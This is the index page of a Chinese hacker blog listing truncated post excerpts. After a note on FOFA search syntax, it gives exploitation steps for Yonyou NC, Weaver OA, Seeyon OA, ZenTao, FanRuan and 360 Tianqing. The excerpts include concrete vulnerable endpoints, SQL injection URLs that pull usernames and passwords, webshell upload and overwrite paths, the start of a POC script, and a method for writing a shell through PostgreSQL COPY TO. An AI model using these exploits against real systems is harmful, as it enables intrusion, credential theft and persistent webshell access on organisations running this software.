Hackeye

Look at the world from the eyes of hackers

fofa常用语法

fofa

直接输入查询语句,将从标题,html内容,http头信息,url字段中搜索;如果查询表达式有多个与或关系,尽量在外面用()包含起来; ==完全匹配的符号,可以加快搜索速度,比如查找qq.com所有host,可以是domain==”qq.com” 高级搜索 可以使用括号 和 &&   !=等符号,如 ...

用友NC反序列化漏洞

命令执行

漏洞利用过程 漏洞URL: 1 /service/~xbrl/XbrlPersistenceServlet POC 1 2 3 4 5 6 7 8 9 10 11 12 13 import requests import threadpool import urllib3 import sys import base64 ip = "" dnslog = "\x79\x37\x6...

泛微0A9前台任意文件上传

文件上传

漏洞利用过程 漏洞位于/page/exportImport/uploadOperation.jsp文件中,直接上传文件getshell。 访问shell http://ip/page/exportImport/fileTransfer/shell.jsp

致远OA前台getshel

getshell

漏洞利用过程 获取管理cookie,然后上传压缩文件解压,getshell 1 2 3 4 5 6 7 8 9 10 POST /seeyon/thirdpartyController.do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accep...

禅道11.6SQL注入漏洞

SQL注入

漏洞利用过程 漏洞URL: 1 2 http://xxx.xxx/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_u...

泛微OA8前台SQL注入漏洞

SQL注入

漏洞利用过程 漏洞URL: 1 http://IP/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=注入 漏洞存在显示1234: 1 http://IP/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id 查询HrmResourceManager表...

帆软v9 getshell

getshell

漏洞利用过程 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: 比如:/tomcat-7.0.96/webapps/ROOT/index.jsp 覆盖 Tomcat 自带 ROOT 目录下的 index.jsp EXP(注入写shell) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 ...

360天擎前台SQL注入漏洞

SQL注入

漏洞利用过程 1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell 2. 通过注入点,创建一张表 O 3. 为 表O 添加一个新字段 T 并且写入shell内容 4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell) 5. 删除 表O EXP(注入写shell) 1 https://IP/api/dp/rpt...